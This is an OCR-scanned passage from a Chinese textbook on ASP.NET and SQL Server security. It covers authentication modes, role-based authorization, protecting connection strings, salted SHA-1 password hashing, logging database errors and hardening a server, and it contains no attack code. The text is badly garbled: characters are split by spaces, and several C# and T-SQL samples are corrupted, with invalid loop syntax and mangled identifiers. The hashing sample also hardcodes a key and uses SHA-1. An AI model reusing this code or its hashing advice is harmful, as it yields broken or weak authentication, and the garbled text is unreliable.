用 户 和 认证 过 程 列 表 的 位 置 ASP.NET 进程 、ASPNET (IS 5.x) 或 
Network Service (IIS 6) SQL 用 户 
SSE 安装 认 安 装 需要 指定 安装 
Trusted_connection=true |user=username; 
连接 字符 中 
或 Integrated Security=true | password=password 


ASP.NET 进程 、ASPNET 

ASPNET Web 应 用 程序 的 用 户 ”|( IS 5.x ) 或 Network|SQL 用 户 
Service (TIS 6) 

无 需 创建 新 账户 即 可 在 宿主 机 上 部 署 ; 独 
较 好 的 安全 性 ; 可 以 对 用 | 立 于 操作 系统 
优势 户 在 SQL 事件 和 Windows | 宿主 的 内 部 网 站 点 只 需 一 般 技术 

事件 中 的 活动 进行 跟踪 ”| 为 应 用 程序 提供 更 加 灵活 的 方式 以 不 同 

的 证 书 来 连接 每 个 数据 库 
密码 存储 在 Web 应 用 程序 中 (在 Windows 
给 予 Web 应 用 程序 | 认证 中 则 不 是 ) 。 确 认 密 码 保存 在 
Windows 证 书 有 可 能 会 将 | Web.config 文件 中 并 已 加 密 
Os 中 的 权限 范围 设置 | 允许 使 用 sa 证 书 的 Web 应 用 程序 的 低级 
过 大 操作 。 总 是 为 ASPNET Web 应 用 程序 创 
建新 的 证 书 并 只 给 予 所 需 的 权限 





劣势 


对 于 开发 人 员 , 需要 考虑 数据 使 用 者 (DataSource 控件 ) 如 何 满 足 需求 。 首先 , 从 VWD 
和 VWD Web Server 获取 的 数据 ， 主 要 是 在 设计 和 测试 的 时 候 使 用 ， 其 次 ， 在 部 署 之 后 应 
当 从 IIS 访问 数据 ， 这 两 个 数据 使 用 者 有 不 同 的 用 户 名 。VWD 和 VWD Web Server 使 用 登 
录 进 Windows 的 人 员 的 名 称 ， 而 IS 程序 使 用 名 称 ASPNET。 

如 果 SQL Server 使 用 Windows 认证 ， 那 么 SqlDataSource 控件 需要 在 连接 字符 串 中 包 
含 如 下 代码 : Integrated Security=true (或 Trusted_connection=true)。 这 个 参数 将 指示 SQL 
Server 根据 请 求 者 的 Windows 登录 账户 对 数据 请 求 进行 认证 。 如 果 是 安装 SSE 的 用 户 , 其 
证 书 将 授予 访问 SSE 的 权限 。 使 用 VWD 和 VWD Web Server 可 以 顺利 通过 验证 ,因为 VWD 
Web Server 的 用 户 被 认为 是 登录 进 Windows 的 开发 人 员 ， 具 有 SSE 上 的 账户 。 但是， 即使 
是 应 用 程序 在 VWD 之 外 工作 正常 ， 当 站 点 迁移 至 IIS 后， 也 有 可 能 不 正常 。 

IIS 是 在 名 为 ASPNET 的 用 户 账户 下 运行 的 (或 是 在 IS7/Windows 2008 Server 中 的 
Network Service)。 因 此 ， 运 行 IS 的 机 器 的 管理 员 必 须 添 加 ASPNET 用 户 并 授予 其 许可 。 
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这 个 过 程 超出 了 本 书 讲解 的 范围 ， 但 是 在 很 多 IIS 管理 员 手 册 中 都 有 详细 的 描述 。 总 而 言 
之 ， 如 果 SQL Server 使 用 的 是 Windows 认证 ， 就 能 使 用 VWD 和 VWD Web Server 进行 本 
书 的 练习 。 只 有 在 授予 了 访问 数据 库 的 ASPNET 进程 账户 许可 之 后 ， 页 面 才能 在 IS 上 
运行 。 

如 果 SQL Server 使 用 的 是 SQL 认证 ， 此 认证 过 程 将 由 SQL 进行 ， 这 个 过 程 不 依靠 
Windows 用 户 列 表 。SQL 认证 中 连接 字符 串 中 包含 了 两 个 参数 : user=usermame ， 
password=password。 现 在 可 以 从 VWD、VWD Web Server 或 IS 中 使 用 页 面 ， 这 个 认证 过 
程 不 需要 在 Windows 中 创建 用 户 账户 ， 可 以 使 用 SQL Server 中 的 账户 ， 默 认 账 户 是 sa。 
在 部 署 之 前 ， 应 当 在 SQL Server 中 创建 另外 一 个 账户 ， 该 账户 只 拥有 执行 .aspx 页 面 的 权 
限 。 如 果 不 创建 sa 以 外 的 替换 账户 《和 用 来 保护 sa 的 密码 )， 那 么 将 会 使 站 点 处 于 最 易于 
利用 的 安全 漏洞 之 中 。 任 何 黑客 都 知道 使 用 空 密码 的 userID='sa' 来 登录 。 

对 以 上 两 种 认证 模式 来 说 ， 当 使 用 如 前 所 述 的 连接 字符 串 时 ， 用 户 将 以 初始 账户 登录 
进 SQL Server。 这 个 账户 就 是 sa， 表 示 系 统管 理 员 ， 它 具有 对 所 有 对 象 的 所 有 权限 。 在 最 
新 的 SQL Server 版 本 中 ， 不 能 以 密码 为 NULL 的 sa 来 安装 服务 。 

在 SSE 中 ， 必 须 以 参数 SAPWD=“MyStrongPassword” 安 装 。 这 里 的 强 密码 保证 密码 
至 少 不 为 NULL。 密 码 最 好 使 用 不 少 于 七 位 的 字符 并 确保 使 用 字母 、 数 字 和 符号 的 混和 
式 。 在 大 多 数 情况 下， 需要 为 每 个 数据 库 和 应 用 程序 指定 一 个 账户 ， 以 避免 让 一 个 应 用 程 
序 拥有 可 以 访问 其 他 应 用 程序 数据 的 权限 。 


5.4.1 数据库 身份 验证 














NN 


当 Web 应 用 程序 与 SQL Server 数据 库 连 接 时 ， 可 以 选择 Windows 身份 验证 或 者 SQL 
身份 验证 ， 相 比 之 下 Windows 的 身份 验证 安全 性 更 高 。 如 果 必 须 使 用 SQL 身份 验证 ， 那 
么 应 该 采取 更 多 步骤 尽 可 能 地 降低 额外 风险 。 

Windows 身份 验证 不 会 跨 网 络 发 送 凭据 。 如 果 Web 应 用 程序 使 用 Windows 身份 验证 ， 
在 大 多 数 情 况 下 ,应 该 使 用 服务 账户 或 进程 账户 (如 ASPNET 账户 ) 来 连接 数据 库 。Windows 
和 SQL Server 必须 能 够 识别 在 数据 库 服务 器 上 使 用 的 账户 。 账 户 被 授予 登录 SQL Server 
的 权限 ， 而 且 登 录 时 需要 有 访问 数据 库 的 相关 权限 。 

使 用 Windows 身份 验证 时 ,应 该 使 用 可 信 的 连接 。 以 下 代码 片段 说 明了 使 用 Windows 
身份 验证 的 典型 连接 字符 串 。 不 需要 填写 数据 库 账 户 和 密码 ， 使 用 集成 验证 ， 代 码 如 下 : 

SqlConnection pubsConn = new SqlConnection( 

"server=dbserver; database=pubs; Integrated Security=SSPI "); 

以 下 示例 使 用 了 OLE DB 数据 源 的 ADO.NET 数据 提供 程序 ， 也 属于 集成 验证 方式 。 
代码 如 下 : 

OleDbConnection pubsConn = new OleDbConnection( 

"Provider=SQLOLEDB; Data Source=dbserver; Integrated Security=SSPI; "+ 
"Initial Catalog=northwind"); 

如 果 开 发 人 员 必 须 使 用 SQL 身份 验证 , 则 应 确保 凭据 不 会 以 明文 形式 跨 网 络 发 送 , 而 
且 应 该 加 密 数 据 库 连 接 字 符 串 ， 因 为 其 中 包含 凭据 。 

为 了 使 SQL Server 能 够 自动 加 密 跨 网 络 发 送 的 凭据 , 通常 的 做 法 是 在 数据 库 服 务 器 上 
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安装 服务 器 证 书 。 此 外 ， 也 可 以 使 用 Web 服务 器 和 数据 库 服 务 器 之 间 的 IPSec 加 密 信道 保 
护 所 有 发 送 到 数据 库 服 务 器 和 来 自 数据 库 服 务 器 的 流量 。 要 保护 连接 字符 串 ， 可 以 使 用 
DPAPI， 请 读者 参考 第 3 章 。 

另外 ， 应 用 程序 应 该 通过 使 用 最 低 特 权 账 户 来 连接 数据 库 。 如 果 使 用 Windows 身份 验 
证 连接 ， 从 操作 系统 的 角度 来 看 ，Windows 账户 应 该 具有 最 低 特权 ， 而 且 应 该 具有 访问 
Windows 资源 的 受 限 特权 和 受 限 能 力 。 此 外 ， 无 论 是 否 使 用 Windows 身份 验证 或 SQL 身 
份 验证 ， 相 应 的 SQL Server 登录 都 应 该 通过 数据 库 中 的 权限 进行 限制 。 





5.4.2 数据库 授 权 


数据 库 授权 过 程 确定 了 用 户 是 否 拥 有 可 检索 和 操作 特定 数据 的 权限 。 数 据 访问 代码 可 
使 用 授权 确定 是 否 执 行 所 请 求 的 操作 , 数据 库 也 可 根据 授权 限制 应 用 程序 使 用 SQL 服务 器 
的 等 级 。 

若 授 权 不 当 ， 用 户 可 能 查询 到 另 一 个 用 户 的 数据 ， 而 未 授权 的 用 户 也 可 能 访问 受 限 的 
数据 。 为 了 防范 这 些 安全 威胁 ， 应 该 限制 未 授权 的 调用 方 或 限制 未 授权 的 代码 或 在 数据 库 
中 限制 应 用 程序 。 

进行 数据 库 连 接 时 应 特别 检查 数据 访问 代码 是 如 何 使 用 权限 对 调用 方 或 代码 进行 授 
权 的 。 要 在 数据 库 中 授权 应 用 程序 使 用 最 低 特权 登录 SQL 服务 器 ,该 登录 账户 只 能 执行 经 
过 选择 的 存储 过 程 。 除 非 有 特殊 原因 ， 和 否则 应 用 程序 将 无 法 直接 对 任何 表 执行 创建 、 检 索 、 
更 新 、 删 除 等 操作 。 

代码 应 该 在 用 户 连接 数据 库 之 前 根据 角色 或 者 标识 对 其 授权 。 角 色 检 查 通常 用 在 应 用 
程序 的 业务 逻辑 中 进行 ， 但 是 如 果 项 目 没 有 明确 区 分 业务 和 数据 访问 届 辑 ， 则 应 该 在 访问 
数据 库 的 方法 中 使 用 主体 权限 要 求 。 

以 下 代码 属性 确保 了 只 有 是 Manager 角色 成 员 的 用 户 才 可 调用 DisplayCustomerInfo 方 
法 显示 客户 信息 。 

[PrincipalPermissionAttribute (SecurityAction.Demand, Role="Manager")] 

// 安全 限制 属性 

public void DisplayCustomerInfo (int CustId) 

{ 

} 


如 果 上 述 权限 控制 还 不 能 满足 需要 ， 则 允许 更 进一步 细 化 授权 ， 并 且 需 要 在 数据 访问 
方法 中 执行 基于 角色 的 逻辑 。 该 方法 需要 使 用 命令 类 型 的 权限 或 者 显 式 的 角色 监控 属性 ， 
如 演示 代码 所 示 : 


using System.Security; 
using System.Security.Permissions; 
public void DisplayCustomerInfo (int CustId) 
时 
try 
,| 
// 执行 角色 检测 是 否 为 manager 
PrincipalPermission principalPerm = new PrincipalPermission(null, 
"Manager") 7 


// 该 范围 内 的 代码 只 在 授权 者 范围 内 执行 角色 "Manager" 
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catch( SecurityException ex ) 
:| 
p 
上 
以 下 演示 代码 运用 显 式 的 方式 ， 实 现 角色 检查 以 确保 调用 方 属于 Manager 角色 成 员 : 


public void DisplayCustomerInfo (int CustId) 
if(!Thread.CurrentPrincipal.IsInRole ("Manager")) 
{ 


} 
} 
对 于 未 授权 的 代码 则 必须 加 以 限制 , 通过 使 用 .NET 框架 的 代码 标识 技术 , 开发 人 员 对 
可 访问 的 数据 类 和 方法 的 程序 集 进行 权限 控制 。 
假设 读者 只 希望 公司 或 特定 的 开发 单位 编写 的 代码 能 够 使 用 数据 访问 组 件 ， 应 该 使 用 
一 个 强 签名 属性 StrongNameIdentityPermissio， 并 要 求 调 用 方程 序 集 拥 有 指定 公 钥 的 强 名 
称 ， 如 以 下 代码 所 示 : 


using System.Security.Permissions; 


[StrongNameIdentityPermission (SecurityAction.LinkDemand, 
PublicKey="0083...8dbf")] 
public void GetCustomerInfo (int CustId) 


更 多 关于 强 签名 的 技术 环节 ， 请 读者 参考 第 7 章 ， 这 里 不 再 详细 讲述 。 
5.4.3 数据库 安全 配置 


数据 访问 代码 在 进行 数据 库 访 问 时 需要 读 取 连 接 字符 串 ， 在 连接 字符 串 中 包含 账户 信 
息 的 时 候 ， 应 该 仔细 考虑 将 这 些 字符 串 存储 在 哪里 ， 以 及 如 何 进行 保护 。 

第 3 章 对 如 何 加 密 数据 库 连 接 串 进行 了 讲解 ， 这 里 将 着 重 介绍 如 何 保存 含有 加 密 字符 
串 的 配置 文件 。 

加 密 的 连接 字符 串 可 以 放 在 注册 表 中 ， 也 可 以 存储 在 Web.config 或 Machine.config 文 
件 中 。 如 果 服 务 器 使 用 HKEY_LOCAL MACHINE 下 的 注册 表 项 , 可 以 对 表 该 项 应 用 ACL， 
其 代码 如 下 : 


Administrators:Full Control 
Process Account:Read 














需要 注意 的 是 ， 进 程 账户 是 由 数据 访问 程序 集 在 其 中 运行 的 进程 所 决定 的 。 这 个 进程 
通常 是 ASPNET 进程 或 企业 服务 器 进程 。 此 外 ， 可 以 考虑 使 用 注册 表 根 项 
HKEY _ CURRENT _ USER， 它 可 提供 受 限 的 访问 。 

如 果 使 用 Microsoft Visual Studio.NET 数据 库 连接 向 导 , 连接 字符 串 将 以 明文 属性 值 的 
形式 存储 在 Web 应 用 程序 代码 隐藏 文件 或 Web.config 文件 中 ， 这 两 种 方式 都 是 极其 不 安 
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全 的 。 

虽然 开发 人 员 可 以 使 用 受 限 的 注册 表 项 提高 安全 性 ， 但 还 是 需要 将 加 密 的 字符 串 存储 
在 Web.config 文件 中 以 便 更 容易 地 进行 部 署 。 在 这 种 情况 下 ， 可 以 使 用 自 定义 的 配置 节 
<appSettings>， 演 示 代 码 如 下 所 示 : 


<?xml version="1.0" encoding="utf-8" ?> 
<configuration> 
<appSettings> 

<add key="connectionstring" value="AQA..bIE=" /> 
</appSettings> 
<system.web> 





/i 

</configuration> 

具体 如 何 读 取 请 参考 第 3 章 , 但 需 注意 的 是 不 要 将 Persist Security Info 设 为 True 或 Yes。 

当 在 连接 字符 串 中 包括 Persist Security Info 属性 时 , 将 使 ConnectionString 属性 在 返回 
给 用 户 之 前 从 连接 字符 串 取 得 密码 。 默 认 设置 false (等 效 于 忽略 Persist Security Info 属性 ) 
在 连接 数据 库 后 会 将 此 信息 丢弃 。 

如 果 应 用 程序 利用 ADO.NET 的 托管 数据 提供 程序 的 外 部 通用 数据 链接 CUDL ) 文件 ， 
则 应 该 使 用 NTFS 的 磁盘 格式 控制 访问 权限 。 

另外 ，UDL 文件 是 没有 加 密 的 。 更 安全 的 方法 是 使 用 DPAPI 加 密 连 接 字 符 串 并 将 其 
存储 在 受 限 的 注册 表 项 。 


5.4.4 ”加 密 敏感 数据 





本 小 节 着 重 讨论 如 何 利用 数据 库 的 巧妙 表 结 构 设 计 保存 高 安全 度 的 数据 ， 也 就 是 通常 
所 说 的 盐 度 加 密 技术 。 

盐 度 加 密 方 法 在 Linux 中 被 广泛 应 用 ， 全 面 提 升 了 用 户 密码 的 安全 性 。 由 于 密码 字符 
串 在 每 一 次 密码 创建 时 都 随机 生成 ， 因此， 即使 两 个 用 户 的 密码 相同 , 但 由 于 加 盐 值 不 同 
最 后 得 到 的 密码 散 列 结果 也 不 同 。 此 方法 在 开发 软件 系统 时 非常 值得 借鉴 。 

在 设计 数据 库 用 户 账户 表 时 ， 需 要 在 用 户 名 ， 密 码 字 段 后 增加 一 个 盐 度 字段 。 盐 度 方 
法 最 终 达 到 的 效果 是 黑客 虽然 得 到 了 用 户 密码 串 ， 但 是 由 于 无 法 获取 盐 度 值 ， 同 样 无 法 模 
拟 正确 的 密码 串 。 

纵 观 其 他 加 密 算 法 ， 虽 然 对 密码 执行 了 散 列 运算 ， 但 并 未 完全 达到 更 高 的 安全 性 。 若 
要 增加 免 受 潜在 攻击 的 安全 性 ， 结 合 数据 库 的 密码 散 列 salt 运算 则 是 最 好 的 选择 。Salt 运 
算 就 是 在 已 执行 散 列 运算 的 密码 中 插入 的 一 个 随机 数字 ， 这 一 策略 有 助 于 阻止 潜在 的 攻击 
者 利用 预先 计算 的 字典 攻击 。 

字典 攻击 是 攻击 者 使 用 密 钥 的 所 有 可 能 组 合 来 破解 密码 的 攻击 。 当 开发 人 员 使 用 salt 
值 使 散 列 运算 进一步 随机 化 后 ， 攻 击 者 将 需要 为 每 个 salt 值 创建 一 个 字典 ， 这 将 使 攻击 变 
得 非常 复杂 且 成 本 极 高 。 

盐 度 加 密 方法 结构 如 图 5-1 所 示 。 
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图 5-1 盐 度 加 密 Salt 


下 面 的 演示 实例 将 告诉 读者 如 何 利 用 盐 度 加 密 算法 设计 用 户 密码 验证 功能 ， 它 需要 数 
据 库 的 配合 。 所 以 在 操作 前 需要 创建 一 个 空 表 ， 包括 用 户 名 、 密 码 、 密 文 、 盐 度 4 个 字段 。 
完成 后 编写 加 密 方 法 ， 其 中 重 构 函数 comparebytearray 用 于 加 密 用 户 密码 并 且 创 建 盐 
度 随机 值 ， 函 数 comparepasswords 用 于 比较 经 过 盐 度 拼接 后 的 字符 数组 是 否 相 等 。 
盐 度 算法 演示 代码 如 下 : 
/// </summary> 
public class AuthorSalt 
{ 
private static string key = "E48%0d-f=cj#%4";// 密 钥 
private const int saltlength = 4; // 定义 salt 值 的 长 度 
/// 对 密码 进行 hash 和 salt 
/// <param name="password"> 用 户 输入 的 密码 </param> 
public static byte[] hashandsalt (string password) 
| 
return createdbpassword (hashpassword(password) ) 7 
} 
/// <summary> 
/// 对 用 户 输入 的 密码 加 上 密 钥 key 后 进行 shal 散 列 
/// </summary> 
/// <param name="password"> 用 户 输入 的 密码 </param> 
/// <returns> 返 回 160 位 sha-1 散 列 后 的 byte[] (160 位 对 应 20 个 字 
节 )</returns> 
private static byte[] hashpassword( string password ) 


// 创建 shal 的 对 象 实例 shal 
shal shal = shal.create(); 
// 计算 输入 数据 的 哈 希 值 
return shal .computehash ( encoding.unicode .getbytes 
( password + key ) ); 
} 
/// <summary> 
/// 比较 数据 库 中 的 密码 和 所 输入 的 密码 是 否 相同 
/// </summary> 
/// <param name="storedpassword"> 数 据 库 中 的 密码 </param> 
/// <param name="password"> 用 户 输入 的 密码 </param> 
/// <returns>true: 相 等 /false: 不 等 </returns> 
public static bool comparepasswords (byte[] storedpassword, 
string password) 
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// 首先 将 用 户 输入 的 密码 进行 hash 散 列 


byte[] hashedpassword = hashpassword (password); 


if (storedpassword == null || hashedpassword == null || 
hashedpassword.length != storedpassword.length 一 
saltlength) 


:| 
return false; 
} 
// 获取 数据 库 中 的 密码 的 salt 值 ,数据库 中 的 密码 的 后 4 个 字 节 为 
salt 值 
byte[] saltvalue = new byte[lsaltlength]; 
int saltoffset = storedpassword.length - saltlength; 
for (int i = 0; i < saltlength; i++) 
{ saltvalue[i] = storedpassword[saltoffset + i]; 
1 
// 用 户 输入 的 密码 用 户 输入 的 密码 加 上 salt 值 ,进行 salt 
byte[] saltedpassword = createsaltedpassword(saltvalue, 
hashedpassword); 
// 比较 数据 库 中 的 密码 和 经 过 salt 的 用 户 输入 密码 是 否 相 等 
return comparebytearray (storedpassword, saltedpassword); 
} 
/// <summary> 
/// 比较 两 个 bytearray, 看 是 否 相 等 
/// </summary> 
/// <param name="arrayl"></param> 
/// <param name="array2"></param> 
/// <returns>true: 相 等 /false: 不 等 </returns> 
private static bool comparebytearray (byte[] arrayl, byte[] 
array2) 
{ 
if (arrayl.length != array2.length) 
{ 
return false; 
} 
for (int 1 = 07 < arrayl. Length; 1++) 
{ 
if (arrayl[i] != array2[i]) 
return false; 
} 
1 
return true; 
1: 
/// <summary> 
/// 对 要 存储 的 密码 进行 salt 运算 
/// </summary> 
/// <param name="unsaltedpassword"> 没 有 进行 过 salt 运算 的 hash 散 
列 密码 </param> 
/// <returns> 经 过 salt 的 密码 (经 过 salt 的 密码 长 度 为 :20+4=24, 存储 密码 的 字段 为 
binary(24))</returns> 
private static byte[] createdbpassword (byte[] unsaltedpassword) 
. 
// 获得 salt 值 
byte[] saltvalue = new byte[lsaltlength]; 
rngcryptoserviceprovider LI = DEW rngcryptoservicep— 
rovider(); 
rng.getbytes (saltvalue); 
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return createsaltedpassword(saltvalue, unsalted-— 
password); 


/// <summary> 

/// 创建 一 个 经 过 salt 的 密码 

/// </summary> 

/// <param name="saltvalue">salt 值 </param> 

/// <param name="unsaltedpassword"> 没 有 进行 过 salt 运算 的 hash 散 

列 密码 </param> 

/// <returns> 经 过 salt 的 密码 </returns> 
private static byte[] createsaltedpassword (byte[] saltvalue, 
byte[] unsaltedpassword) 

// 将 salt 值 数组 添加 到 hash 散 列 数组 后 拼接 成 rawsalted 数组 中 
byte[] rawsalted = new byte[unsaltedpassword.length + 
saltvalue.length]; 
unsaltedpassword.copyto (rawsalted, 0); 
saltvalue.copyto (rawsalted, unsaltedpassword.length); 

// 将 合并 后 的 rawsalted 数组 再 进行 shal 散 列 的 到 saltedpassword 数组 (长 
度 为 20 字 节 ) 
shal shal = shal.create(); 
byte[] saltedpassword = shal.computehash (rawsalted); 
// 将 salt 值 数组 在 添加 到 saltedpassword 数组 后 拼接 成 dbpassword 数组 (长 

度 为 24 字 节 ) 
byte[] dbpassword = new byte[saltedpassword.length + 
saltvalue.length]; 
saltedpassword.copyto (dbpassword, 0); 
saltvalue.copyto (dbpassword, saltedpassword.length); 

return dbpassword; 


} 
5.4.5 ”安全 处 理 出 错 数据 


数据 库 和 Web 技术 配合 使 用 的 过 程 中 ,时 常 可 能 出 现 各 类 的 操作 执行 错误 。 当 出 现 类 
似 错误 后 ， 数 据 库 会 反馈 一 些 错 误 包 给 应 用 程序 。 这 些 错 误 包 往 往 被 开发 人 员 忽 视 ， 为 了 
调试 方便 就 直接 输出 或 记录 在 系统 。 这 样 做 是 极其 不 安全 的 ， 因 为 错误 包 很 多 包含 数据 的 
敏感 信息 ， 诸 如 数据 库 名 称 、 数 据 表 、 用 户 名 等 。 

本 小 节 着 重 讨论 如 何 对 外 界 隐蔽 数据 库 反 馈 的 敏感 数据 包 ， 以 及 如 何 正确 利用 .NET 
技术 处 理 错 误 包 数据 ， 该 方法 对 JAVA，PHP 技术 同样 适用 。 

通常 程序 代码 与 数据 库 通信 都 需要 调用 数据 库 驱 动 程序 ，JSP、PHP 都 自己 各 类 的 驱 
动 ， 而 .NET 技术 中 则 是 ADO.NET 技术 。 

ADONET 负责 与 数据 库 和 应 用 程序 沟通 ， 所 以 开发 人 员 需 要 从 它 下 手 ， 严 格 的 捕获 
和 记录 ADONET 异常 。 

具体 做 法 是 : 将 数据 访问 代码 置 于 try/catch 块 中 并 处 理 异 常 。 在 编写 ADONET 数据 
访问 代码 时 ，ADO.NET 所 产生 的 异常 类 型 取决 于 数据 提供 程序 。 

例如 ， 下 列 的 3 种 情况 : 
口 SQL Server .NET 框架 数据 提供 程序 将 生成 SqlExceptions 异常 类 型 。 
口 OLE DB NET 框架 数据 提供 程序 将 生成 OleDbExceptions 异常 类 型 。 
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口 ODBC NET 框架 数据 提供 程序 将 生成 OdbcExceptions 异常 类 型 。 

下 面 举 一 个 实例 说 明 如 何 利用 try/catch 块 捕获 异常 数据 包 。 

以 下 代码 使 用 SQL ServerNET 框架 数据 提供 程序 , 并 演示 如 何 捕获 SqlException 类 型 
的 异常 : 

try 


{ 
// 你 的 数据 访问 代码 


} 

// 处 理 捕 获 的 数据 

catch (SqlException sqlex) // 
{ 


} 
// 处 理 无 法 识别 的 数据 包 
catch (Exception ex) 
{ 


通过 上 述 代 码 ， 就 能 够 处 理 简 单 的 数据 库 反馈 包 ， 但 是 如 果 需 要 应 用 程序 更 加 安全 的 
运用 ， 则 需要 编写 日 志 处 理 代码 。 

日 志 的 功能 是 记录 异常 信息 ， 对 于 专门 处 理 SQL 错误 的 对 象 SqlException 类 ， 它 公开 
了 包含 异常 情况 详细 信息 的 属性 。 这 包括 一 个 说 明 错误 的 Message 属性 ， 一 个 唯一 标识 错 
误 类 型 的 Number 属性 ， 和 一 个 包含 其 他 信息 的 State 属性 。State 属性 通常 用 来 指示 特定 错 
误 情 况 的 某 次 出 现 。 例 如 ， 如 果 存 储 过 程 在 不 止 一 行 中 出 现 了 同样 的 错误 ，State 属性 可 指 
示 特 定 的 那 一 次 。 最 后 Errors 集合 包含 可 提供 详细 SQL Server 错误 信息 的 SqlError 对 象 。 

下 面 的 实例 用 来 说 明 如 何 通 过 使 用 SQL Server NET 框架 数据 提供 程序 处 理 SQL 
Server 错误 情况 。 代 码 使 用 SQL Server 2005 默认 自 带 的 northwind 数据 库 。 

该 处 理 类 的 技术 关键 就 是 对 错误 包 的 再 次 封装 ， 在 抛 出 错误 包 的 同时 又 不 包括 敏感 信 
息 ， 在 具体 代码 中 利用 方法 LogException 再 次 封装 错误 包 。 

日 志 处 理 类 演示 代码 如 下 : 


using System.Data; 
using System.Data.SqlClient; 
using System.Diagnostics; 
public string GetProductName( int OrderID ) 
{ 
SqlConnection conn = new SqlConnection( 
"server=(local);Integrated Security=SSPI;database=Northwind"); 
// 开启 Try 模块 
try 
d 
conn.Open (); 
SqlCommand cmd = new SqlCommand ("LookupOrderName", conn ); 
cmd.CommandType = CommandType.StoredProcedure; 
cmd.Parameters.Add("@OrderID ", OrderID ); 
SqlParameter paramPN = cmd.Parameters.Add("@ProductName", SqlDbType. 
VarChar, 40 ); 
paramPN.Direction = ParameterDirection.Output; 
cmd .ExecuteNonQuery (); 
return paramPN.Value.ToString(); 
二 
// 捕获 错误 数据 
catch (SqlException sqlex) 
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// 处 理 错误 数据 
// 加 工 数据 包 
LogException (sqlex); 
// 重新 包装 错误 包 并 抛 出 
throw new Exception ("获取 订单 数据 出 错 :" + OrderID.Tostring()，sqlex ); 
Th 
finally 
i 
conn.Close(); 
} 
} 
private void LogException( SqlException sqlex ) 
{ 
EventLog el = new EventLog(); 
el.Source = "CustomAppLog"; 
string strMessage; 
strMessage = "错误 编号 : " + sqlex.Number + 
" ("+ sqlex.Message + ") 已 经 发 生 "; 
el.WriteEntry( strMessage ); 
foreach (SqlError sqle in sqlex.Errors) 
{ 
strMessage = "Message: " + sqle.Message + 
" Number: "+ sqle.Number + 
" Procedure: " + sqle.Procedure + 
" Server: " + sqle.Server + 
" Source: " + sqle.Source + 
-Stales “sqleo-State + 
" Severity: " + sqle.Class + 
" LineNumber: " + sqle.LineNumber; 
el.WriteEntry( strMessage ); 
. 


5.4.6 正确 安装 数据 库 


尽管 开发 人 员 可 能 对 应 用 程序 代码 和 加 密 过 程 很 重视 ， 但 软件 部 署 时 出 现 漏 洞 的 情况 
也 应 被 重视 。 本 小 节 将 讲解 如 何 安全 的 部 署 SQL 服务 器 ， 其 中 包括 参数 设置 和 脚本 加 固 。 
以 SQL Server 2008 为 例 ， 在 部 署 中 需要 按照 如 下 的 步骤 进行 安全 加 固 ; 


1. 首先 设置 用 户 角色 


最 简单 的 就 是 设置 为 只 允许 SQL 的 用 户 访问 SQL (防止 利用 administrator 组 用 户 
访问 )。 

设置 步骤 如 下 : 

(1) 打开 企业 管理 器 ， 选 择 “SQL 实例 ”一 “属性 ”一 “安全 性 ”一 “身份 验证 ”一 
“SQL Server 和 Windows” 命 令 。 

(2) 打开 企业 管理 器 ， 选 择 “ 安 全 性 ”一 “登录 ”一 “设置 密码 ”。 

(3) 删除 用 户 : 


BUILTIN\Administrators 
< 机 器 名 >\Administrator 


这 样 可 以 防止 用 Windows 身份 登录 SQL 服务 器 。 
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2. 设置 进入 企业 管理 器 的 密码 


在 企业 管理 器 中 右 击 你 的 服务 器 实例 (有 绿色 图 标 )， 编 辑 SQL Server 注册 属性 ， 然 
后 选择 “使 用 SQL Server 身份 验证 ?”， 并 选中 “总 是 提示 输入 登录 名 和 密码 ” 复 选 枉 。 经 
过 上 述 设置 ，SQL Server 基本 上 安全 。 


3. 更 改 默认 端口 ， 隐 藏 服务 器 ， 减 少 被 攻击 的 可 能 性 


具体 步骤 如 下 : 

(1) 选择 SQL Server 服务 器 ， 选 择 “ 开 始 ” 一 “程序 ”一 Microsoft SQL Server 命令 ， 
选择 “服务 器 网 络 实用 工具 ”一 “TCP/IP” 一 “属性 ”一 “默认 端口 ”， 输 入 一 个 自己 定 
义 的 端口 ， 如 2433 一 色 选 隐藏 服务 器 。 

(2) 对 SQL 用 户 进行 管理 ， 防 止 它 访问 不 该 被 访问 的 数据 库 〈 总 控制 ， 通 过 明细 还 可 
以 控制 他 对 于 某 个 数据 库 的 具体 对 象 具 有 的 权限 )。 


4. 部 团 新 系统 需要 使 用 的 数据 库 时 ， 为 特定 用 户 配置 权限 


具体 步骤 如 下 : 
(1) 切换 到 新 增 的 用 户 要 控制 的 数据 库 ， 输 入 下 列 脚 本 : 


use 你 的 库 名 

go 

一 -新 增 用 户 

exec sp addlogin 'test' =-- 添 加 登录 

exec sp grantdbaccess Ntest” =-- 使 其 成 为 当前 数据 库 的 合法 用 户 


exec sp addrolemember N'db owner'， N'test'  -- 授 予 对 自己 数据 库 的 所 有 权限 


这 样 创建 的 用 户 就 只 能 访问 自己 的 数据 库 ， 数 据 库 中 包含 了 guest 用 户 的 公共 表 。 


go 

=-- 删 除 测试 用 户 

exec SP_reVokedbaccess N'test" =-- 移 除 对 数据 库 的 访问 权限 
exec sp droplogin N'"test'" =-- 删 除 登 录 


如 果 在 企业 管理 器 中 创建 的 话 ， 可 以 通过 选择 “企业 管理 器 ”一 “安全 性 ”一 “ 登 
录 ” 一 “新 建 ” 一 “常规 项 ”一 “用 户 名 ”。 

(2) 身份 验证 方式 根据 用 户 需 要 进行 选择 (如 果 是 使 用 Windows 身份 验证 ， 则 要 先 在 
操作 系统 的 用 户 中 新 建 用 户 ) 

默认 设置 中 可 以 选择 新 建 的 用 户 要 访问 的 数据 库 名 ， 通 过 数据 库 访问 项 勾 选 已 经 创建 
的 用 户 需要 访问 的 数据 库 ， 数 据 库 角色 中 允许 勾 选 public 和 db_ownew 复 选 框 。 选 择 完毕 
后 点 击 确定 ， 这 样 建 好 的 用 户 与 上 面 语句 建立 的 用 户 是 一 致 的 。 


5. 为 具体 的 用 户 设置 具体 的 访问 权限 
可 参考 下 面 示例 : 
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=-- 添 加 只 允许 访问 指定 表 的 用 户 
exec sp addlogin ' 用 户 名 ',' 密 码 ',' 默 认 数据 库 名 " 


一 -添加 到 数据 库 


exec sp _grantdbaccess “' 用 户 名 ' 


一 分配 整 表 权限 
GRANT SELECT 


. 


INSERT ， UPDATE ， DELETE ON tablel TO [用 户 名 ] 


一 -分 配 权限 到 具体 的 列 


GRANT SELECT 


a 


UPDATE ON tablel (id,AA) TO [用 户 名 ] 
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当 用 户 在 应 用 程序 中 输入 数据 时 ， 系 统 应 该 在 程序 使 用 该 数据 前 ， 验 证 该 数据 是 否 有 
